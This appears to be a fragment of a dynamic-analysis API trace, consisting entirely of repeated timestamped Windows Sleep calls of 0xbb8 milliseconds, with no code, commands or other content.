	[0138.061] Sleep (dwMilliseconds=0xbb8) 
	[0138.076] Sleep (dwMilliseconds=0xbb8) 
	[0138.092] Sleep (dwMilliseconds=0xbb8) 
	[0138.108] Sleep (dwMilliseconds=0xbb8) 
	[0138.123] Sleep (dwMilliseconds=0xbb8) 
	[0138.139] Sleep (dwMilliseconds=0xbb8) 
	[0138.154] Sleep (dwMilliseconds=0xbb8) 
	[0138.170] Sleep (dwMilliseconds=0xbb8) 
	[0138.185] Sleep (dwMilliseconds=0xbb8) 
	[0138.201] Sleep (dwMilliseconds=0xbb8) 
	[0138.217] Sleep (dwMilliseconds=0xbb8) 
	[0138.232] Sleep (dwMilliseconds=0xbb8) 
	[0138.263] Sleep (dwMilliseconds=0xbb8) 
	[0138.264] Sleep (dwMilliseconds=0xbb8) 
	[0138.279] Sleep (dwMilliseconds=0xbb8) 
	[0138.295] Sleep (dwMilliseconds=0xbb8) 
	[0138.310] Sleep (dwMilliseconds=0xbb8) 
	[0138.326] Sleep (dwMilliseconds=0xbb8) 
	[0138.342] Sleep (dwMilliseconds=0xbb8) 
	[0138.357] Sleep (dwMilliseconds=0xbb8) 
	[0138.386] Sleep (dwMilliseconds=0xbb8) 
	[0138.388] Sleep (dwMilliseconds=0xbb8) 
	[0138.404] Sleep (dwMilliseconds=0xbb8) 
	[0138.420] Sleep (dwMilliseconds=0xbb8) 
	[0138.435] Sleep (dwMilliseconds=0xbb8) 
	[0138.451] Sleep (dwMilliseconds=0xbb8) 
	[0138.467] Sleep (dwMilliseconds=0xbb8) 
	[0138.482] Sleep (dwMilliseconds=0xbb8) 
	[0138.498] Sleep (dwMilliseconds=0xbb8) 
	[0138.513] Sleep (dwMilliseconds=0xbb8) 
	[0138.529] Sleep (dwMilliseconds=0xbb8) 
	[0138.545] Sleep (dwMilliseconds=0xbb8) 
	[0138.561] Sleep (dwMilliseconds=0xbb8) 
	[0138.576] Sleep (dwMilliseconds=0xbb8) 
	[0138.591] Sleep (dwMilliseconds=0xbb8) 
	[0138.609] Sleep (dwMilliseconds=0xbb8) 
	[0138.623] Sleep (dwMilliseconds=0xbb8) 
	[0138.638] Sleep (dwMilliseconds=0xbb8) 
	[0138.670] Sleep (dwMilliseconds=0xbb8) 
	[0138.685] Sleep (dwMilliseconds=0xbb8) 
	[0138.700] Sleep (dwMilliseconds=0xbb8) 
	[0138.716] Sleep (dwMilliseconds=0xbb8) 
	[0138.732] Sleep (dwMilliseconds=0xbb8) 
	[0138.747] Sleep (dwMilliseconds=0xbb8) 
	[0138.763] Sleep (dwMilliseconds=0xbb8) 
	[0138.779] Sleep (dwMilliseconds=0xbb8) 
	[0138.794] Sleep (dwMilliseconds=0xbb8) 
	[0138.810] Sleep (dwMilliseconds=0xbb8) 
	[0138.825] Sleep (dwMilliseconds=0xbb8) 
	[0138.841] Sleep (dwMilliseconds=0xbb8) 
	[0138.856] Sleep (dwMilliseconds=0xbb8) 
	[0138.872] Sleep (dwMilliseconds=0xbb8) 
	[0138.889] Sleep (dwMilliseconds=0xbb8) 
	[0138.903] Sleep (dwMilliseconds=0xbb8) 
	[0138.919] Sleep (dwMilliseconds=0xbb8) 
	[0138.934] Sleep (dwMilliseconds=0xbb8) 
	[0138.950] Sleep (dwMilliseconds=0xbb8) 
	[0138.965] Sleep (dwMilliseconds=0xbb8) 
	[0138.981] Sleep (dwMilliseconds=0xbb8) 
	[0139.001] Sleep (dwMilliseconds=0xbb8) 
	[0139.012] Sleep (dwMilliseconds=0xbb8) 
	[0139.028] Sleep (dwMilliseconds=0xbb8) 
	[0139.044] Sleep (dwMilliseconds=0xbb8) 
	[0139.059] Sleep (dwMilliseconds=0xbb8) 
	[0139.075] Sleep (dwMilliseconds=0xbb8) 
	[0139.090] Sleep (dwMilliseconds=0xbb8) 
	[0139.106] Sleep (dwMilliseconds=0xbb8) 
	[0139.121] Sleep (dwMilliseconds=0xbb8) 
	[0139.137] Sleep (dwMilliseconds=0xbb8) 
	[0139.153] Sleep (dwMilliseconds=0xbb8) 
	[0139.168] Sleep (dwMilliseconds=0xbb8) 
	[0139.184] Sleep (dwMilliseconds=0xbb8) 
	[0139.200] Sleep (dwMilliseconds=0xbb8) 
	[0139.215] Sleep (dwMilliseconds=0xbb8) 
	[0139.231] Sleep (dwMilliseconds=0xbb8) 
	[0139.251] Sleep (dwMilliseconds=0xbb8) 
	[0139.272] Sleep (dwMilliseconds=0xbb8) 
	[0139.278] Sleep (dwMilliseconds=0xbb8) 
	[0139.293] Sleep (dwMilliseconds=0xbb8) 
	[0139.309] Sleep (dwMilliseconds=0xbb8) 
	[0139.325] Sleep (dwMilliseconds=0xbb8) 
	[0139.340] Sleep (dwMilliseconds=0xbb8) 
	[0139.356] Sleep (dwMilliseconds=0xbb8) 
	[0139.371] Sleep (dwMilliseconds=0xbb8) 
	[0139.397] Sleep (dwMilliseconds=0xbb8) 
	[0139.403] Sleep (dwMilliseconds=0xbb8) 
	[0139.418] Sleep (dwMilliseconds=0xbb8) 
	[0139.434] Sleep (dwMilliseconds=0xbb8) 
	[0139.449] Sleep (dwMilliseconds=0xbb8) 
	[0139.465] Sleep (dwMilliseconds=0xbb8) 
	[0139.482] Sleep (dwMilliseconds=0xbb8) 
	[0139.496] Sleep (dwMilliseconds=0xbb8) 
	[0139.512] Sleep (dwMilliseconds=0xbb8) 
	[0139.527] Sleep (dwMilliseconds=0xbb8) 
	[0139.545] Sleep (dwMilliseconds=0xbb8) 
	[0139.559] Sleep (dwMilliseconds=0xbb8) 
	[0139.574] Sleep (dwMilliseconds=0xbb8) 
	[0139.590] Sleep (dwMilliseconds=0xbb8) 
	[0139.605] Sleep (dwMilliseconds=0xbb8) 
	[0139.621] Sleep (dwMilliseconds=0xbb8) 
	[0139.636] Sleep (dwMilliseconds=0xbb8) 
	[0139.665] Sleep (dwMilliseconds=0xbb8) 
	[0139.670] Sleep (dwMilliseconds=0xbb8) 
	[0139.683] Sleep (dwMilliseconds=0xbb8) 
	[0139.699] Sleep (dwMilliseconds=0xbb8) 
	[0139.714] Sleep (dwMilliseconds=0xbb8) 
	[0139.730] Sleep (dwMilliseconds=0xbb8) 
	[0139.746] Sleep (dwMilliseconds=0xbb8) 
	[0139.762] Sleep (dwMilliseconds=0xbb8) 
	[0139.777] Sleep (dwMilliseconds=0xbb8) 
	[0139.792] Sleep (dwMilliseconds=0xbb8) 
	[0139.808] Sleep (dwMilliseconds=0xbb8) 
	[0139.824] Sleep (dwMilliseconds=0xbb8) 
	[0139.840] Sleep (dwMilliseconds=0xbb8) 
	[0139.855] Sleep (dwMilliseconds=0xbb8) 
	[0139.871] Sleep (dwMilliseconds=0xbb8) 
	[0139.888] Sleep (dwMilliseconds=0xbb8) 
	[0139.902] Sleep (dwMilliseconds=0xbb8) 
	[0139.917] Sleep (dwMilliseconds=0xbb8) 
	[0139.933] Sleep (dwMilliseconds=0xbb8) 
	[0139.948] Sleep (dwMilliseconds=0xbb8) 
	[0139.964] Sleep (dwMilliseconds=0xbb8) 
	[0139.980] Sleep (dwMilliseconds=0xbb8) 
	[0139.996] Sleep (dwMilliseconds=0xbb8) 
	[0140.011] Sleep (dwMilliseconds=0xbb8) 
	[0140.026] Sleep (dwMilliseconds=0xbb8) 
	[0140.042] Sleep (dwMilliseconds=0xbb8) 
	[0140.058] Sleep (dwMilliseconds=0xbb8) 
	[0140.074] Sleep (dwMilliseconds=0xbb8) 
	[0140.089] Sleep (dwMilliseconds=0xbb8) 
	[0140.105] Sleep (dwMilliseconds=0xbb8) 
	[0140.120] Sleep (dwMilliseconds=0xbb8) 
	[0140.136] Sleep (dwMilliseconds=0xbb8) 
	[0140.154] Sleep (dwMilliseconds=0xbb8) 
	[0140.167] Sleep (dwMilliseconds=0xbb8) 
	[0140.183] Sleep (dwMilliseconds=0xbb8) 
	[0140.199] Sleep (dwMilliseconds=0xbb8) 
	[0140.214] Sleep (dwMilliseconds=0xbb8) 
	[0140.229] Sleep (dwMilliseconds=0xbb8) 
	[0140.245] Sleep (dwMilliseconds=0xbb8) 
	[0140.260] Sleep (dwMilliseconds=0xbb8) 
	[0140.292] Sleep (dwMilliseconds=0xbb8) 
	[0140.307] Sleep (dwMilliseconds=0xbb8) 
	[0140.323] Sleep (dwMilliseconds=0xbb8) 
	[0140.338] Sleep (dwMilliseconds=0xbb8) 
	[0140.354] Sleep (dwMilliseconds=0xbb8) 
	[0140.370] Sleep (dwMilliseconds=0xbb8) 
	[0140.385] Sleep (dwMilliseconds=0xbb8) 
	[0140.416] Sleep (dwMilliseconds=0xbb8) 
	[0140.416] Sleep (dwMilliseconds=0xbb8) 
	[0140.432] Sleep (dwMilliseconds=0xbb8) 
	[0140.447] Sleep (dwMilliseconds=0xbb8) 
	[0140.463] Sleep (dwMilliseconds=0xbb8) 
	[0140.479] Sleep (dwMilliseconds=0xbb8) 
	[0140.494] Sleep (dwMilliseconds=0xbb8) 
	[0140.510] Sleep (dwMilliseconds=0xbb8) 
	[0140.526] Sleep (dwMilliseconds=0xbb8) 
	[0140.541] Sleep (dwMilliseconds=0xbb8) 
	[0140.557] Sleep (dwMilliseconds=0xbb8) 
	[0140.573] Sleep (dwMilliseconds=0xbb8) 
	[0140.588] Sleep (dwMilliseconds=0xbb8) 
	[0140.605] Sleep (dwMilliseconds=0xbb8) 
	[0140.619] Sleep (dwMilliseconds=0xbb8) 
	[0140.635] Sleep (dwMilliseconds=0xbb8) 
	[0140.668] Sleep (dwMilliseconds=0xbb8) 
	[0140.681] Sleep (dwMilliseconds=0xbb8) 
	[0140.697] Sleep (dwMilliseconds=0xbb8) 
	[0140.713] Sleep (dwMilliseconds=0xbb8) 
	[0140.729] Sleep (dwMilliseconds=0xbb8) 
	[0140.745] Sleep (dwMilliseconds=0xbb8) 
	[0140.760] Sleep (dwMilliseconds=0xbb8) 
	[0140.775] Sleep (dwMilliseconds=0xbb8) 
	[0140.791] Sleep (dwMilliseconds=0xbb8) 
	[0140.806] Sleep (dwMilliseconds=0xbb8) 
	[0140.822] Sleep (dwMilliseconds=0xbb8) 
	[0140.838] Sleep (dwMilliseconds=0xbb8) 
	[0140.854] Sleep (dwMilliseconds=0xbb8) 
	[0140.869] Sleep (dwMilliseconds=0xbb8) 
	[0140.885] Sleep (dwMilliseconds=0xbb8) 
	[0140.900] Sleep (dwMilliseconds=0xbb8) 
	[0140.916] Sleep (dwMilliseconds=0xbb8) 
	[0140.931] Sleep (dwMilliseconds=0xbb8) 
	[0140.948] Sleep (dwMilliseconds=0xbb8) 
	[0140.963] Sleep (dwMilliseconds=0xbb8) 
	[0140.978] Sleep (dwMilliseconds=0xbb8) 
	[0140.994] Sleep (dwMilliseconds=0xbb8) 
	[0141.009] Sleep (dwMilliseconds=0xbb8) 
	[0141.025] Sleep (dwMilliseconds=0xbb8) 
	[0141.040] Sleep (dwMilliseconds=0xbb8) 
	[0141.056] Sleep (dwMilliseconds=0xbb8) 
	[0141.072] Sleep (dwMilliseconds=0xbb8) 
	[0141.087] Sleep (dwMilliseconds=0xbb8) 
	[0141.103] Sleep (dwMilliseconds=0xbb8) 
	[0141.118] Sleep (dwMilliseconds=0xbb8) 
	[0141.134] Sleep (dwMilliseconds=0xbb8) 
	[0141.150] Sleep (dwMilliseconds=0xbb8) 
	[0141.165] Sleep (dwMilliseconds=0xbb8) 
	[0141.181] Sleep (dwMilliseconds=0xbb8) 
	[0141.197] Sleep (dwMilliseconds=0xbb8) 
	[0141.212] Sleep (dwMilliseconds=0xbb8) 
	[0141.230] Sleep (dwMilliseconds=0xbb8) 
	[0141.243] Sleep (dwMilliseconds=0xbb8) 
	[0141.259] Sleep (dwMilliseconds=0xbb8) 
	[0141.275] Sleep (dwMilliseconds=0xbb8) 
	[0141.290] Sleep (dwMilliseconds=0xbb8) 
	[0141.306] Sleep (dwMilliseconds=0xbb8) 
	[0141.321] Sleep (dwMilliseconds=0xbb8) 
	[0141.337] Sleep (dwMilliseconds=0xbb8) 
	[0141.352] Sleep (dwMilliseconds=0xbb8) 
	[0141.368] Sleep (dwMilliseconds=0xbb8) 
	[0141.383] Sleep (dwMilliseconds=0xbb8) 
	[0141.399] Sleep (dwMilliseconds=0xbb8) 
	[0141.423] Sleep (dwMilliseconds=0xbb8) 
	[0141.430] Sleep (dwMilliseconds=0xbb8) 
	[0141.446] Sleep (dwMilliseconds=0xbb8) 
	[0141.461] Sleep (dwMilliseconds=0xbb8) 
	[0141.477] Sleep (dwMilliseconds=0xbb8) 
	[0141.493] Sleep (dwMilliseconds=0xbb8) 
	[0141.527] Sleep (dwMilliseconds=0xbb8) 
	[0141.540] Sleep (dwMilliseconds=0xbb8) 
	[0141.555] Sleep (dwMilliseconds=0xbb8) 
	[0141.571] Sleep (dwMilliseconds=0xbb8) 
	[0141.587] Sleep (dwMilliseconds=0xbb8) 
	[0141.602] Sleep (dwMilliseconds=0xbb8) 
	[0141.619] Sleep (dwMilliseconds=0xbb8) 
	[0141.633] Sleep (dwMilliseconds=0xbb8) 
	[0141.660] Sleep (dwMilliseconds=0xbb8) 
	[0141.666] Sleep (dwMilliseconds=0xbb8) 
	[0141.680] Sleep (dwMilliseconds=0xbb8) 
	[0141.695] Sleep (dwMilliseconds=0xbb8) 
	[0141.711] Sleep (dwMilliseconds=0xbb8) 
	[0141.727] Sleep (dwMilliseconds=0xbb8) 
	[0141.742] Sleep (dwMilliseconds=0xbb8) 
	[0141.759] Sleep (dwMilliseconds=0xbb8) 
	[0141.774] Sleep (dwMilliseconds=0xbb8) 
	[0141.789] Sleep (dwMilliseconds=0xbb8) 
	[0141.805] Sleep (dwMilliseconds=0xbb8) 
	[0141.821] Sleep (dwMilliseconds=0xbb8) 
	[0141.837] Sleep (dwMilliseconds=0xbb8) 
	[0141.855] Sleep (dwMilliseconds=0xbb8) 
	[0141.867] Sleep (dwMilliseconds=0xbb8) 
	[0141.883] Sleep (dwMilliseconds=0xbb8) 
	[0141.900] Sleep (dwMilliseconds=0xbb8) 
	[0141.914] Sleep (dwMilliseconds=0xbb8) 
	[0141.930] Sleep (dwMilliseconds=0xbb8) 
	[0141.947] Sleep (dwMilliseconds=0xbb8) 
	[0141.961] Sleep (dwMilliseconds=0xbb8) 
	[0141.976] Sleep (dwMilliseconds=0xbb8) 
	[0141.992] Sleep (dwMilliseconds=0xbb8) 
	[0142.007] Sleep (dwMilliseconds=0xbb8) 
	[0142.023] Sleep (dwMilliseconds=0xbb8) 
	[0142.039] Sleep (dwMilliseconds=0xbb8) 
	[0142.058] Sleep (dwMilliseconds=0xbb8) 
	[0142.070] Sleep (dwMilliseconds=0xbb8) 
	[0142.086] Sleep (dwMilliseconds=0xbb8) 
	[0142.101] Sleep (dwMilliseconds=0xbb8) 
	[0142.117] Sleep (dwMilliseconds=0xbb8) 
	[0142.133] Sleep (dwMilliseconds=0xbb8) 
	[0142.148] Sleep (dwMilliseconds=0xbb8) 
	[0142.164] Sleep (dwMilliseconds=0xbb8) 
	[0142.179] Sleep (dwMilliseconds=0xbb8) 
	[0142.195] Sleep (dwMilliseconds=0xbb8) 
	[0142.210] Sleep (dwMilliseconds=0xbb8) 
	[0142.226] Sleep (dwMilliseconds=0xbb8) 
	[0142.245] Sleep (dwMilliseconds=0xbb8) 
	[0142.257] Sleep (dwMilliseconds=0xbb8) 
	[0142.273] Sleep (dwMilliseconds=0xbb8) 
	[0142.313] Sleep (dwMilliseconds=0xbb8) 
	[0142.320] Sleep (dwMilliseconds=0xbb8) 
	[0142.335] Sleep (dwMilliseconds=0xbb8) 
	[0142.353] Sleep (dwMilliseconds=0xbb8) 
	[0142.366] Sleep (dwMilliseconds=0xbb8) 
	[0142.383] Sleep (dwMilliseconds=0xbb8) 
	[0142.398] Sleep (dwMilliseconds=0xbb8) 
	[0142.413] Sleep (dwMilliseconds=0xbb8) 
	[0142.440] Sleep (dwMilliseconds=0xbb8) 
	[0142.446] Sleep (dwMilliseconds=0xbb8) 
	[0142.460] Sleep (dwMilliseconds=0xbb8) 
	[0142.475] Sleep (dwMilliseconds=0xbb8) 
	[0142.491] Sleep (dwMilliseconds=0xbb8) 
	[0142.507] Sleep (dwMilliseconds=0xbb8) 
	[0142.522] Sleep (dwMilliseconds=0xbb8) 
	[0142.538] Sleep (dwMilliseconds=0xbb8) 
	[0142.553] Sleep (dwMilliseconds=0xbb8) 
	[0142.569] Sleep (dwMilliseconds=0xbb8) 
	[0142.585] Sleep (dwMilliseconds=0xbb8) 
	[0142.601] Sleep (dwMilliseconds=0xbb8) 
	[0142.616] Sleep (dwMilliseconds=0xbb8) 
	[0142.632] Sleep (dwMilliseconds=0xbb8) 
	[0142.667] Sleep (dwMilliseconds=0xbb8) 
	[0142.679] Sleep (dwMilliseconds=0xbb8) 
	[0142.694] Sleep (dwMilliseconds=0xbb8) 
	[0142.710] Sleep (dwMilliseconds=0xbb8) 
	[0142.725] Sleep (dwMilliseconds=0xbb8) 
	[0142.741] Sleep (dwMilliseconds=0xbb8) 
	[0142.756] Sleep (dwMilliseconds=0xbb8) 
	[0142.772] Sleep (dwMilliseconds=0xbb8) 
	[0142.788] Sleep (dwMilliseconds=0xbb8) 
	[0142.803] Sleep (dwMilliseconds=0xbb8) 
	[0142.819] Sleep (dwMilliseconds=0xbb8) 
	[0142.835] Sleep (dwMilliseconds=0xbb8) 
	[0142.850] Sleep (dwMilliseconds=0xbb8) 
	[0142.866] Sleep (dwMilliseconds=0xbb8) 
	[0142.881] Sleep (dwMilliseconds=0xbb8) 
	[0142.899] Sleep (dwMilliseconds=0xbb8) 
	[0142.913] Sleep (dwMilliseconds=0xbb8) 
	[0142.928] Sleep (dwMilliseconds=0xbb8) 
	[0142.945] Sleep (dwMilliseconds=0xbb8) 
	[0142.959] Sleep (dwMilliseconds=0xbb8) 
	[0142.975] Sleep (dwMilliseconds=0xbb8) 
	[0142.990] Sleep (dwMilliseconds=0xbb8) 
	[0143.030] Sleep (dwMilliseconds=0xbb8) 
	[0143.037] Sleep (dwMilliseconds=0xbb8) 
	[0143.053] Sleep (dwMilliseconds=0xbb8) 
	[0143.068] Sleep (dwMilliseconds=0xbb8) 
	[0143.084] Sleep (dwMilliseconds=0xbb8) 
	[0143.100] Sleep (dwMilliseconds=0xbb8) 
	[0143.115] Sleep (dwMilliseconds=0xbb8) 
	[0143.131] Sleep (dwMilliseconds=0xbb8) 
	[0143.146] Sleep (dwMilliseconds=0xbb8) 
	[0143.162] Sleep (dwMilliseconds=0xbb8) 
	[0143.178] Sleep (dwMilliseconds=0xbb8) 
	[0143.193] Sleep (dwMilliseconds=0xbb8) 
	[0143.209] Sleep (dwMilliseconds=0xbb8) 
	[0143.224] Sleep (dwMilliseconds=0xbb8) 
	[0143.240] Sleep (dwMilliseconds=0xbb8) 
	[0143.255] Sleep (dwMilliseconds=0xbb8) 
	[0143.271] Sleep (dwMilliseconds=0xbb8) 
	[0143.287] Sleep (dwMilliseconds=0xbb8) 
	[0143.303] Sleep (dwMilliseconds=0xbb8) 
	[0143.318] Sleep (dwMilliseconds=0xbb8) 
	[0143.334] Sleep (dwMilliseconds=0xbb8) 
	[0143.349] Sleep (dwMilliseconds=0xbb8) 
	[0143.365] Sleep (dwMilliseconds=0xbb8) 
	[0143.380] Sleep (dwMilliseconds=0xbb8) 
	[0143.396] Sleep (dwMilliseconds=0xbb8) 
	[0143.412] Sleep (dwMilliseconds=0xbb8) 
	[0143.427] Sleep (dwMilliseconds=0xbb8) 
	[0143.457] Sleep (dwMilliseconds=0xbb8) 
	[0143.458] Sleep (dwMilliseconds=0xbb8) 
	[0143.474] Sleep (dwMilliseconds=0xbb8) 
	[0143.490] Sleep (dwMilliseconds=0xbb8) 
	[0143.505] Sleep (dwMilliseconds=0xbb8) 
	[0143.521] Sleep (dwMilliseconds=0xbb8) 
	[0143.556] Sleep (dwMilliseconds=0xbb8) 
	[0143.569] Sleep (dwMilliseconds=0xbb8) 
	[0143.583] Sleep (dwMilliseconds=0xbb8) 
	[0143.599] Sleep (dwMilliseconds=0xbb8) 
	[0143.614] Sleep (dwMilliseconds=0xbb8) 
	[0143.630] Sleep (dwMilliseconds=0xbb8) 
	[0143.660] Sleep (dwMilliseconds=0xbb8) 
	[0143.661] Sleep (dwMilliseconds=0xbb8) 
	[0143.677] Sleep (dwMilliseconds=0xbb8) 
	[0143.692] Sleep (dwMilliseconds=0xbb8) 
	[0143.708] Sleep (dwMilliseconds=0xbb8) 
	[0143.724] Sleep (dwMilliseconds=0xbb8) 
	[0143.742] Sleep (dwMilliseconds=0xbb8) 
	[0143.755] Sleep (dwMilliseconds=0xbb8) 
	[0143.772] Sleep (dwMilliseconds=0xbb8) 
	[0143.786] Sleep (dwMilliseconds=0xbb8) 
	[0143.802] Sleep (dwMilliseconds=0xbb8) 
	[0143.819] Sleep (dwMilliseconds=0xbb8) 
	[0143.833] Sleep (dwMilliseconds=0xbb8) 
	[0143.849] Sleep (dwMilliseconds=0xbb8) 
	[0143.865] Sleep (dwMilliseconds=0xbb8) 
	[0143.880] Sleep (dwMilliseconds=0xbb8) 
	[0143.898] Sleep (dwMilliseconds=0xbb8) 
	[0143.911] Sleep (dwMilliseconds=0xbb8) 
	[0143.927] Sleep (dwMilliseconds=0xbb8) 
	[0143.942] Sleep (dwMilliseconds=0xbb8) 
	[0143.958] Sleep (dwMilliseconds=0xbb8) 
	[0143.973] Sleep (dwMilliseconds=0xbb8) 
	[0143.989] Sleep (dwMilliseconds=0xbb8) 
	[0144.004] Sleep (dwMilliseconds=0xbb8) 
	[0144.020] Sleep (dwMilliseconds=0xbb8) 
	[0144.036] Sleep (dwMilliseconds=0xbb8) 
	[0144.052] Sleep (dwMilliseconds=0xbb8) 
	[0144.067] Sleep (dwMilliseconds=0xbb8) 
	[0144.082] Sleep (dwMilliseconds=0xbb8) 
	[0144.098] Sleep (dwMilliseconds=0xbb8) 
	[0144.114] Sleep (dwMilliseconds=0xbb8) 
	[0144.129] Sleep (dwMilliseconds=0xbb8) 
	[0144.145] Sleep (dwMilliseconds=0xbb8) 
	[0144.160] Sleep (dwMilliseconds=0xbb8) 
	[0144.176] Sleep (dwMilliseconds=0xbb8) 
	[0144.192] Sleep (dwMilliseconds=0xbb8) 
	[0144.208] Sleep (dwMilliseconds=0xbb8) 
	[0144.223] Sleep (dwMilliseconds=0xbb8) 
	[0144.241] Sleep (dwMilliseconds=0xbb8) 
	[0144.254] Sleep (dwMilliseconds=0xbb8) 
	[0144.270] Sleep (dwMilliseconds=0xbb8) 
	[0144.285] Sleep (dwMilliseconds=0xbb8) 
	[0144.301] Sleep (dwMilliseconds=0xbb8) 
	[0144.340] Sleep (dwMilliseconds=0xbb8) 
	[0144.348] Sleep (dwMilliseconds=0xbb8) 
	[0144.363] Sleep (dwMilliseconds=0xbb8) 
	[0144.379] Sleep (dwMilliseconds=0xbb8) 
	[0144.394] Sleep (dwMilliseconds=0xbb8) 
	[0144.410] Sleep (dwMilliseconds=0xbb8) 
	[0144.426] Sleep (dwMilliseconds=0xbb8) 
	[0144.441] Sleep (dwMilliseconds=0xbb8) 
	[0144.470] Sleep (dwMilliseconds=0xbb8) 
	[0144.472] Sleep (dwMilliseconds=0xbb8) 
	[0144.488] Sleep (dwMilliseconds=0xbb8) 
	[0144.503] Sleep (dwMilliseconds=0xbb8) 
	[0144.519] Sleep (dwMilliseconds=0xbb8) 
	[0144.535] Sleep (dwMilliseconds=0xbb8) 
	[0144.550] Sleep (dwMilliseconds=0xbb8) 
	[0144.566] Sleep (dwMilliseconds=0xbb8) 
	[0144.582] Sleep (dwMilliseconds=0xbb8) 
	[0144.597] Sleep (dwMilliseconds=0xbb8) 
	[0144.613] Sleep (dwMilliseconds=0xbb8) 
	[0144.629] Sleep (dwMilliseconds=0xbb8) 
	[0144.655] Sleep (dwMilliseconds=0xbb8) 
	[0144.660] Sleep (dwMilliseconds=0xbb8) 
	[0144.675] Sleep (dwMilliseconds=0xbb8) 
	[0144.691] Sleep (dwMilliseconds=0xbb8) 
	[0144.706] Sleep (dwMilliseconds=0xbb8) 
	[0144.722] Sleep (dwMilliseconds=0xbb8) 
	[0144.738] Sleep (dwMilliseconds=0xbb8) 
	[0144.754] Sleep (dwMilliseconds=0xbb8) 
	[0144.769] Sleep (dwMilliseconds=0xbb8) 
	[0144.785] Sleep (dwMilliseconds=0xbb8) 
	[0144.800] Sleep (dwMilliseconds=0xbb8) 
	[0144.816] Sleep (dwMilliseconds=0xbb8) 
	[0144.831] Sleep (dwMilliseconds=0xbb8) 
	[0144.847] Sleep (dwMilliseconds=0xbb8) 
	[0144.863] Sleep (dwMilliseconds=0xbb8) 
	[0144.878] Sleep (dwMilliseconds=0xbb8) 
	[0144.894] Sleep (dwMilliseconds=0xbb8) 
	[0144.909] Sleep (dwMilliseconds=0xbb8) 
	[0144.925] Sleep (dwMilliseconds=0xbb8) 
	[0144.941] Sleep (dwMilliseconds=0xbb8) 
	[0144.956] Sleep (dwMilliseconds=0xbb8) 
	[0144.972] Sleep (dwMilliseconds=0xbb8) 
	[0144.987] Sleep (dwMilliseconds=0xbb8) 
	[0145.003] Sleep (dwMilliseconds=0xbb8) 
	[0145.018] Sleep (dwMilliseconds=0xbb8) 
	[0145.034] Sleep (dwMilliseconds=0xbb8) 
	[0145.050] Sleep (dwMilliseconds=0xbb8) 
	[0145.067] Sleep (dwMilliseconds=0xbb8) 
	[0145.081] Sleep (dwMilliseconds=0xbb8) 
	[0145.096] Sleep (dwMilliseconds=0xbb8) 
	[0145.112] Sleep (dwMilliseconds=0xbb8) 
	[0145.127] Sleep (dwMilliseconds=0xbb8) 
	[0145.146] Sleep (dwMilliseconds=0xbb8) 
	[0145.159] Sleep (dwMilliseconds=0xbb8) 
	[0145.174] Sleep (dwMilliseconds=0xbb8) 
	[0145.190] Sleep (dwMilliseconds=0xbb8) 
	[0145.206] Sleep (dwMilliseconds=0xbb8) 
	[0145.221] Sleep (dwMilliseconds=0xbb8) 
	[0145.237] Sleep (dwMilliseconds=0xbb8) 
	[0145.253] Sleep (dwMilliseconds=0xbb8) 
	[0145.268] Sleep (dwMilliseconds=0xbb8) 
	[0145.284] Sleep (dwMilliseconds=0xbb8) 
	[0145.300] Sleep (dwMilliseconds=0xbb8) 
	[0145.318] Sleep (dwMilliseconds=0xbb8) 
	[0145.330] Sleep (dwMilliseconds=0xbb8) 
	[0145.350] Sleep (dwMilliseconds=0xbb8) 
	[0145.362] Sleep (dwMilliseconds=0xbb8) 
	[0145.377] Sleep (dwMilliseconds=0xbb8) 
	[0145.393] Sleep (dwMilliseconds=0xbb8) 
	[0145.409] Sleep (dwMilliseconds=0xbb8) 
	[0145.424] Sleep (dwMilliseconds=0xbb8) 
	[0145.440] Sleep (dwMilliseconds=0xbb8) 
	[0145.455] Sleep (dwMilliseconds=0xbb8) 
	[0145.471] Sleep (dwMilliseconds=0xbb8) 
	[0145.486] Sleep (dwMilliseconds=0xbb8) 
	[0145.502] Sleep (dwMilliseconds=0xbb8) 
	[0145.518] Sleep (dwMilliseconds=0xbb8) 
	[0145.533] Sleep (dwMilliseconds=0xbb8) 
	[0145.551] Sleep (dwMilliseconds=0xbb8) 
	[0145.564] Sleep (dwMilliseconds=0xbb8) 
	[0145.580] Sleep (dwMilliseconds=0xbb8) 
	[0145.595] Sleep (dwMilliseconds=0xbb8) 
	[0145.611] Sleep (dwMilliseconds=0xbb8) 
	[0145.627] Sleep (dwMilliseconds=0xbb8) 
	[0145.654] Sleep (dwMilliseconds=0xbb8) 
	[0145.658] Sleep (dwMilliseconds=0xbb8) 
	[0145.674] Sleep (dwMilliseconds=0xbb8) 
	[0145.689] Sleep (dwMilliseconds=0xbb8) 
	[0145.705] Sleep (dwMilliseconds=0xbb8) 
	[0145.720] Sleep (dwMilliseconds=0xbb8) 
	[0145.737] Sleep (dwMilliseconds=0xbb8) 
	[0145.752] Sleep (dwMilliseconds=0xbb8) 
	[0145.767] Sleep (dwMilliseconds=0xbb8) 
	[0145.783] Sleep (dwMilliseconds=0xbb8) 
	[0145.798] Sleep (dwMilliseconds=0xbb8) 
	[0145.814] Sleep (dwMilliseconds=0xbb8) 
	[0145.830] Sleep (dwMilliseconds=0xbb8) 
	[0145.846] Sleep (dwMilliseconds=0xbb8) 
	[0145.861] Sleep (dwMilliseconds=0xbb8) 
	[0145.876] Sleep (dwMilliseconds=0xbb8) 
	[0145.892] Sleep (dwMilliseconds=0xbb8) 
	[0145.908] Sleep (dwMilliseconds=0xbb8) 
	[0145.923] Sleep (dwMilliseconds=0xbb8) 
	[0145.939] Sleep (dwMilliseconds=0xbb8) 
	[0145.955] Sleep (dwMilliseconds=0xbb8) 
	[0145.970] Sleep (dwMilliseconds=0xbb8) 
	[0145.987] Sleep (dwMilliseconds=0xbb8) 
	[0146.001] Sleep (dwMilliseconds=0xbb8) 
	[0146.017] Sleep (dwMilliseconds=0xbb8) 
	[0146.032] Sleep (dwMilliseconds=0xbb8) 
	[0146.048] Sleep (dwMilliseconds=0xbb8) 
	[0146.064] Sleep (dwMilliseconds=0xbb8) 
	[0146.079] Sleep (dwMilliseconds=0xbb8) 
	[0146.099] Sleep (dwMilliseconds=0xbb8) 
	[0146.110] Sleep (dwMilliseconds=0xbb8) 
	[0146.126] Sleep (dwMilliseconds=0xbb8) 
	[0146.142] Sleep (dwMilliseconds=0xbb8) 
	[0146.157] Sleep (dwMilliseconds=0xbb8) 
	[0146.173] Sleep (dwMilliseconds=0xbb8) 
	[0146.188] Sleep (dwMilliseconds=0xbb8) 
	[0146.204] Sleep (dwMilliseconds=0xbb8) 
	[0146.220] Sleep (dwMilliseconds=0xbb8) 
	[0146.235] Sleep (dwMilliseconds=0xbb8) 
	[0146.251] Sleep (dwMilliseconds=0xbb8) 
